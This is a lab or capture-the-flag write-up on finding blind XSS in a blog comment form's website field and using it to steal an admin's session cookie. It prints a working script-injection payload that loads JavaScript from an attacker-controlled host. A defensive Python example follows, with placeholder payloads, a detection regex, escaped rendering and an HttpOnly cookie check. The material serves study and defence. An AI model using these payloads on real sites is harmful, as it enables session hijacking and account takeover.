# Brief

1. Identify a user-input field that is vulnerable to XSS
2. Find a working XSS payload that executes JavaScript code in the target's browser
3. Using the `Session Hijacking` techniques, try to steal the victim's cookies, which should contain the flag

# XSS Detection

- Ping test
  ![[images/Pasted image 20251215194848.png]]
- Nmap scan
  ![[images/Pasted image 20251215194854.png]]
- Visit `/assessment` page
  ![[images/Pasted image 20251215195008.png]]
- Visit security blog page
  ![[images/Pasted image 20251215195043.png]]

## Search field @ `/assessment`

- Try the `<script>alert(window.origin)</script>` payload in the search box
- We get some interesting feedback
  ![[images/Pasted image 20251215195318.png]]
- Run `xsstrike`
- No quick results
- Not going anywhere fast; we can come back to this

## Security blog comment form @ `/assessment/index.php`

- Create a test comment to see how the page behaves
  ![[images/Pasted image 20251216183130.png]]
- Nothing happens, but the text below indicates blind XSS, since comments are reviewed by an admin
  ![[images/Pasted image 20251216183238.png]]
- Start a PHP listener on Kali
  ![[images/Pasted image 20251215200421.png]]
- Load up the comment form with blind XSS test remote scripts
- Use a different extension for each field so we know which one hits (if any)
  ![[images/Pasted image 20251215200413.png]]
- GET request on the website field!
  ![[images/Pasted image 20251215200436.png]]
- Also getting hits using the `"><script src` payload or the vanilla `<script src` payload in the website field

# Session Hijacking

- Set up `script.js`
  ![[images/Pasted image 20251215201226.png]]
- Set up `index.php`
  ![[images/Pasted image 20251215200952.png]]
- Start the listener in the `/tmp/tmpserver` directory
  ![[images/Pasted image 20251215201125.png]]
- Prepare the XSS payload

```html
'><script src="http://10.10.14.233:8080/script.js"></script>
```

- Inject the XSS payload to steal the cookie
  ![[images/Pasted image 20251215201515.png]]
- GOT'EMM
  ![[images/Pasted image 20251215201607.png]]
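The two findings above, seen from the application's side: a stored comment field whose contents reach an admin's browser, and a session cookie that injected script can read. This is an added example, not part of the original notes or the lab. The submissions, the `attacker.invalid` URLs and the function names are constructed for illustration; the cookie name `PHPSESSID` is assumed from the page being a PHP application. It flags submissions that carry script or attribute-break-out markers, renders a comment with every untrusted value escaped (and refuses to link a non-http(s) "website"), and checks whether a `Set-Cookie` header leaves the session cookie readable from `document.cookie`.

```python
"""Defender-side view of a stored/blind XSS comment form and a script-readable
session cookie. Added example; not the lab's or the write-up's own code."""
import html
import re
from http.cookies import SimpleCookie

# Constructed sample form submissions, as a comment-review backend might log them.
# The attacker.invalid hosts are placeholders, not values from the lab.
SAMPLE_SUBMISSIONS = [
    {"name": "alice", "comment": "Nice post!", "website": "https://example.org"},
    {"name": "bob", "comment": "<script src=//attacker.invalid/c.js></script>", "website": ""},
    {"name": "carol", "comment": "ok",
     "website": '"><script src="http://attacker.invalid/w.js"></script>'},
    {"name": "dave", "comment": "See http://example.org/article", "website": "http://example.org"},
]

# Markers of an attempt to inject markup into a stored field: a <script> tag,
# an on*= event-handler attribute, a javascript: URL, or a quote-and-bracket
# attribute break-out ("> or '>) immediately followed by a new tag.
_INJECTION_RE = re.compile(r"(?i)(<\s*script\b|\bon[a-z]+\s*=|javascript\s*:|['\"]\s*>\s*<)")


def flag_injection_attempts(submissions):
    """Return (submission index, field name) for every field that looks like an XSS probe."""
    hits = []
    for i, sub in enumerate(submissions):
        for field, value in sub.items():
            if _INJECTION_RE.search(value):
                hits.append((i, field))
    return hits


def render_comment(sub):
    """Render one submission as HTML with every untrusted value escaped.

    Escaping neutralises the stored payload for the admin who reviews it;
    the website field is only turned into a link when it is an http(s) URL,
    so javascript: or markup values never become an href.
    """
    safe = {k: html.escape(v, quote=True) for k, v in sub.items()}
    if sub["website"].lower().startswith(("http://", "https://")):
        author = f'<a href="{safe["website"]}">{safe["name"]}</a>'
    else:
        author = f'<span>{safe["name"]}</span>'
    return f'<div class="comment">{author}<p>{safe["comment"]}</p></div>'


def session_cookie_is_script_readable(set_cookie_header, name="PHPSESSID"):
    """True if the named cookie lacks HttpOnly (so document.cookie exposes it),
    False if HttpOnly is set, None if the header does not set that cookie."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    morsel = jar.get(name)
    if morsel is None:
        return None
    return not morsel["httponly"]


if __name__ == "__main__":
    print("flagged:", flag_injection_attempts(SAMPLE_SUBMISSIONS))
    print(render_comment(SAMPLE_SUBMISSIONS[1]))
    print("readable without HttpOnly:",
          session_cookie_is_script_readable("PHPSESSID=abc123; Path=/"))
    print("readable with HttpOnly:",
          session_cookie_is_script_readable("PHPSESSID=abc123; Path=/; HttpOnly; SameSite=Lax"))
```

The regex is a triage filter for review queues and logs, not a sanitiser; the rendering step is what actually prevents the admin's browser from executing a stored comment. The cookie check is the mitigation for the final step of the write-up: with `HttpOnly` on the session cookie, an injected script that does run cannot read it.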